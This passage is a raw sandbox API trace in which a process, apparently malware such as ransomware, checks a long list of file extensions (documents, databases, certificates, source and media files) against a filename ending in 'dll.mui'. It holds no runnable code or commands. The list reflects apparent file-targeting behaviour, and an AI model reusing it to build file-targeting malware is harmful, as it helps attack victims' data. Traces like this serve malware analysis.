returned 6 [0286.201] lstrcmpiW (lpString1=".accdc", lpString2="ll.mui") returned -1 [0286.201] lstrlenW (lpString=".accde") returned 6 [0286.201] lstrcmpiW (lpString1=".accde", lpString2="ll.mui") returned -1 [0286.201] lstrlenW (lpString=".accdt") returned 6 [0286.201] lstrcmpiW (lpString1=".accdt", lpString2="ll.mui") returned -1 [0286.201] lstrlenW (lpString=".accdw") returned 6 [0286.201] lstrcmpiW (lpString1=".accdw", lpString2="ll.mui") returned -1 [0286.201] lstrlenW (lpString=".adb") returned 4 [0286.201] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".adp") returned 4 [0286.201] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".ai") returned 3 [0286.201] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.201] lstrlenW (lpString=".ai3") returned 4 [0286.201] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".ai4") returned 4 [0286.201] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".ai5") returned 4 [0286.201] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".ai6") returned 4 [0286.201] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".ai7") returned 4 [0286.201] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".ai8") returned 4 [0286.201] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".anim") returned 5 [0286.202] lstrcmpiW (lpString1=".anim", lpString2="l.mui") returned -1 [0286.202] lstrlenW (lpString=".arw") returned 4 [0286.202] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".as") returned 3 [0286.202] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.202] lstrlenW (lpString=".asa") returned 4 [0286.202] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".asc") returned 4 [0286.202] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".ascx") returned 5 [0286.202] lstrcmpiW (lpString1=".ascx", lpString2="l.mui") returned -1 [0286.202] lstrlenW (lpString=".asm") returned 4 [0286.202] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".asmx") returned 5 [0286.202] lstrcmpiW (lpString1=".asmx", lpString2="l.mui") returned -1 [0286.202] lstrlenW (lpString=".asp") returned 4 [0286.202] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".aspx") returned 5 [0286.202] lstrcmpiW (lpString1=".aspx", lpString2="l.mui") returned -1 [0286.202] lstrlenW (lpString=".asr") returned 4 [0286.202] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".asx") returned 4 [0286.202] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".avi") returned 4 [0286.202] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".avs") returned 4 [0286.202] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".backup") returned 7 [0286.202] lstrcmpiW (lpString1=".backup", lpString2="dll.mui") returned -1 [0286.202] lstrlenW (lpString=".bak") returned 4 [0286.202] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.202] lstrlenW (lpString=".bay") returned 4 [0286.203] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".bd") returned 3 [0286.203] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.203] lstrlenW (lpString=".bin") returned 4 [0286.203] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".bmp") returned 4 [0286.203] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".bz2") returned 4 [0286.203] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".c") returned 2 [0286.203] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.203] lstrlenW (lpString=".cdr") returned 4 [0286.203] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".cer") returned 4 [0286.203] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".cf") returned 3 [0286.203] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.203] lstrlenW (lpString=".cfc") returned 4 [0286.203] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".cfm") returned 4 [0286.203] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".cfml") returned 5 [0286.203] lstrcmpiW (lpString1=".cfml", lpString2="l.mui") returned -1 [0286.203] lstrlenW (lpString=".cfu") returned 4 [0286.203] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".chm") returned 4 [0286.203] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.203] lstrlenW (lpString=".cin") returned 4 [0286.203] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".class") returned 6 [0286.204] lstrcmpiW (lpString1=".class", lpString2="ll.mui") returned -1 [0286.204] lstrlenW (lpString=".clx") returned 4 [0286.204] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".config") returned 7 [0286.204] lstrcmpiW (lpString1=".config", lpString2="dll.mui") returned -1 [0286.204] lstrlenW (lpString=".cpp") returned 4 [0286.204] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".cr2") returned 4 [0286.204] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".crt") returned 4 [0286.204] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".crw") returned 4 [0286.204] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".cs") returned 3 [0286.204] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.204] lstrlenW (lpString=".css") returned 4 [0286.204] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".csv") returned 4 [0286.204] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".cub") returned 4 [0286.204] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".dae") returned 4 [0286.204] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".dat") returned 4 [0286.204] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.204] lstrlenW (lpString=".db") returned 3 [0286.204] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.204] lstrlenW (lpString=".dbf") returned 4 [0286.205] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dbx") returned 4 [0286.205] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dc3") returned 4 [0286.205] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dcm") returned 4 [0286.205] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dcr") returned 4 [0286.205] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".der") returned 4 [0286.205] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dib") returned 4 [0286.205] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dic") returned 4 [0286.205] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".dif") returned 4 [0286.205] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".divx") returned 5 [0286.205] lstrcmpiW (lpString1=".divx", lpString2="l.mui") returned -1 [0286.205] lstrlenW (lpString=".djvu") returned 5 [0286.205] lstrcmpiW (lpString1=".djvu", lpString2="l.mui") returned -1 [0286.205] lstrlenW (lpString=".dng") returned 4 [0286.205] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".doc") returned 4 [0286.205] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.205] lstrlenW (lpString=".docm") returned 5 [0286.205] lstrcmpiW (lpString1=".docm", lpString2="l.mui") returned -1 [0286.205] lstrlenW (lpString=".docx") returned 5 [0286.205] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0286.205] lstrlenW (lpString=".dot") returned 4 [0286.205] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dotm") returned 5 [0286.206] lstrcmpiW (lpString1=".dotm", lpString2="l.mui") returned -1 [0286.206] lstrlenW (lpString=".dotx") returned 5 [0286.206] lstrcmpiW (lpString1=".dotx", lpString2="l.mui") returned -1 [0286.206] lstrlenW (lpString=".dpx") returned 4 [0286.206] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dqy") returned 4 [0286.206] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dsn") returned 4 [0286.206] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dt") returned 3 [0286.206] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.206] lstrlenW (lpString=".dtd") returned 4 [0286.206] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dwg") returned 4 [0286.206] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dwt") returned 4 [0286.206] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".dx") returned 3 [0286.206] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.206] lstrlenW (lpString=".dxf") returned 4 [0286.206] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".edml") returned 5 [0286.206] lstrcmpiW (lpString1=".edml", lpString2="l.mui") returned -1 [0286.206] lstrlenW (lpString=".efd") returned 4 [0286.206] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".elf") returned 4 [0286.206] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".emf") returned 4 [0286.206] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".emz") returned 4 [0286.206] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".epf") returned 4 [0286.206] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.206] lstrlenW (lpString=".eps") returned 4 [0286.206] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".epsf") returned 5 [0286.207] lstrcmpiW (lpString1=".epsf", lpString2="l.mui") returned -1 [0286.207] lstrlenW (lpString=".epsp") returned 5 [0286.207] lstrcmpiW (lpString1=".epsp", lpString2="l.mui") returned -1 [0286.207] lstrlenW (lpString=".erf") returned 4 [0286.207] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".exr") returned 4 [0286.207] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".f4v") returned 4 [0286.207] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".fido") returned 5 [0286.207] lstrcmpiW (lpString1=".fido", lpString2="l.mui") returned -1 [0286.207] lstrlenW (lpString=".flm") returned 4 [0286.207] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".flv") returned 4 [0286.207] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".frm") returned 4 [0286.207] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".fxg") returned 4 [0286.207] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".geo") returned 4 [0286.207] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".gif") returned 4 [0286.207] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".grs") returned 4 [0286.207] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".gz") returned 3 [0286.207] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.207] lstrlenW (lpString=".h") returned 2 [0286.207] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.207] lstrlenW (lpString=".hdr") returned 4 [0286.207] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".hpp") returned 4 [0286.207] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.207] lstrlenW (lpString=".hta") returned 4 [0286.207] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".htc") returned 4 [0286.208] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".htm") returned 4 [0286.208] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".html") returned 5 [0286.208] lstrcmpiW (lpString1=".html", lpString2="l.mui") returned -1 [0286.208] lstrlenW (lpString=".icb") returned 4 [0286.208] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".ics") returned 4 [0286.208] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".iff") returned 4 [0286.208] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".inc") returned 4 [0286.208] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".indd") returned 5 [0286.208] lstrcmpiW (lpString1=".indd", lpString2="l.mui") returned -1 [0286.208] lstrlenW (lpString=".ini") returned 4 [0286.208] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".iqy") returned 4 [0286.208] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".j2c") returned 4 [0286.208] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".j2k") returned 4 [0286.208] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.208] lstrlenW (lpString=".java") returned 5 [0286.208] lstrcmpiW (lpString1=".java", lpString2="l.mui") returned -1 [0286.208] lstrlenW (lpString=".jp2") returned 4 [0286.208] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".jpc") returned 4 [0286.209] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".jpe") returned 4 [0286.209] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".jpeg") returned 5 [0286.209] lstrcmpiW (lpString1=".jpeg", lpString2="l.mui") returned -1 [0286.209] lstrlenW (lpString=".jpf") returned 4 [0286.209] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".jpg") returned 4 [0286.209] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".jpx") returned 4 [0286.209] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".js") returned 3 [0286.209] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.209] lstrlenW (lpString=".jsf") returned 4 [0286.209] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.209] lstrlenW (lpString=".json") returned 5 [0286.209] lstrcmpiW (lpString1=".json", lpString2="l.mui") returned -1 [0286.209] lstrlenW (lpString=".jsp") returned 4 [0286.300] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.300] lstrlenW (lpString=".kdc") returned 4 [0286.300] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.300] lstrlenW (lpString=".kmz") returned 4 [0286.301] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".kwm") returned 4 [0286.301] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".lasso") returned 6 [0286.301] lstrcmpiW (lpString1=".lasso", lpString2="ll.mui") returned -1 [0286.301] lstrlenW (lpString=".lbi") returned 4 [0286.301] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".lgf") returned 4 [0286.301] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".lgp") returned 4 [0286.301] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".log") returned 4 [0286.301] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".m1v") returned 4 [0286.301] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".m4a") returned 4 [0286.301] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".m4v") returned 4 [0286.301] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".max") returned 4 [0286.301] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".md") returned 3 [0286.301] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.301] lstrlenW (lpString=".mda") returned 4 [0286.301] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".mdb") returned 4 [0286.301] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".mde") returned 4 [0286.301] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".mdf") returned 4 [0286.301] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".mdw") returned 4 [0286.301] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".mef") returned 4 [0286.301] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.301] lstrlenW (lpString=".mft") returned 4 [0286.301] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mfw") returned 4 [0286.302] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mht") returned 4 [0286.302] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mhtml") returned 6 [0286.302] lstrcmpiW (lpString1=".mhtml", lpString2="ll.mui") returned -1 [0286.302] lstrlenW (lpString=".mka") returned 4 [0286.302] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mkidx") returned 6 [0286.302] lstrcmpiW (lpString1=".mkidx", lpString2="ll.mui") returned -1 [0286.302] lstrlenW (lpString=".mkv") returned 4 [0286.302] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mos") returned 4 [0286.302] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mov") returned 4 [0286.302] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mp3") returned 4 [0286.302] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mp4") returned 4 [0286.302] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mpeg") returned 5 [0286.302] lstrcmpiW (lpString1=".mpeg", lpString2="l.mui") returned -1 [0286.302] lstrlenW (lpString=".mpg") returned 4 [0286.302] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mpv") returned 4 [0286.302] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mrw") returned 4 [0286.302] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".msg") returned 4 [0286.302] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.302] lstrlenW (lpString=".mxl") returned 4 [0286.302] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.302] lstrlenW (lpString=".myd") returned 4 [0286.302] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.302] lstrlenW (lpString=".myi") returned 4 [0286.302] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.302] lstrlenW (lpString=".nef") returned 4 [0286.303] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".nrw") returned 4 [0286.303] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".obj") returned 4 [0286.303] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".odb") returned 4 [0286.303] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".odc") returned 4 [0286.303] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".odm") returned 4 [0286.303] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".odp") returned 4 [0286.303] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".ods") returned 4 [0286.303] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.303] lstrlenW (lpString=".oft") returned 4 [0286.304] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.304] lstrlenW (lpString=".one") returned 4 [0286.304] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.304] lstrlenW (lpString=".onepkg") returned 7 [0286.304] lstrcmpiW (lpString1=".onepkg", lpString2="dll.mui") returned -1 [0286.304] lstrlenW (lpString=".onetoc2") returned 8 [0286.304] lstrcmpiW (lpString1=".onetoc2", lpString2=".dll.mui") returned 1 [0286.304] lstrlenW (lpString=".opt") returned 4 [0286.304] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".oqy") returned 4 [0286.305] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".orf") returned 4 [0286.305] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".p12") returned 4 [0286.305] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".p7b") returned 4 [0286.305] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".p7c") returned 4 [0286.305] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pam") returned 4 [0286.305] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pbm") returned 4 [0286.305] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pct") returned 4 [0286.305] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pcx") returned 4 [0286.305] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pdd") returned 4 [0286.305] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pdf") returned 4 [0286.305] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pdp") returned 4 [0286.305] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pef") returned 4 [0286.305] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pem") returned 4 [0286.305] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pff") returned 4 [0286.305] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pfm") returned 4 [0286.305] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pfx") returned 4 [0286.305] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".pgm") returned 4 [0286.305] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.305] lstrlenW (lpString=".php") returned 4 [0286.305] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".php3") returned 5 [0286.306] lstrcmpiW (lpString1=".php3", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".php4") returned 5 [0286.306] lstrcmpiW (lpString1=".php4", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".php5") returned 5 [0286.306] lstrcmpiW (lpString1=".php5", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".phtml") returned 6 [0286.306] lstrcmpiW (lpString1=".phtml", lpString2="ll.mui") returned -1 [0286.306] lstrlenW (lpString=".pict") returned 5 [0286.306] lstrcmpiW (lpString1=".pict", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".pl") returned 3 [0286.306] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.306] lstrlenW (lpString=".pls") returned 4 [0286.306] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".pm") returned 3 [0286.306] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.306] lstrlenW (lpString=".png") returned 4 [0286.306] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".pnm") returned 4 [0286.306] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".pot") returned 4 [0286.306] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".potm") returned 5 [0286.306] lstrcmpiW (lpString1=".potm", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".potx") returned 5 [0286.306] lstrcmpiW (lpString1=".potx", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".ppa") returned 4 [0286.306] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".ppam") returned 5 [0286.306] lstrcmpiW (lpString1=".ppam", lpString2="l.mui") returned -1 [0286.306] lstrlenW (lpString=".ppm") returned 4 [0286.306] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".pps") returned 4 [0286.306] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.306] lstrlenW (lpString=".ppsm") returned 5 [0286.306] lstrcmpiW (lpString1=".ppsm", lpString2="l.mui") returned -1 [0286.307] lstrlenW (lpString=".ppt") returned 4 [0286.307] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".pptm") returned 5 [0286.307] lstrcmpiW (lpString1=".pptm", lpString2="l.mui") returned -1 [0286.307] lstrlenW (lpString=".pptx") returned 5 [0286.307] lstrcmpiW (lpString1=".pptx", lpString2="l.mui") returned -1 [0286.307] lstrlenW (lpString=".prn") returned 4 [0286.307] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".ps") returned 3 [0286.307] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.307] lstrlenW (lpString=".psb") returned 4 [0286.307] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".psd") returned 4 [0286.307] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".pst") returned 4 [0286.307] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".ptx") returned 4 [0286.307] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.307] 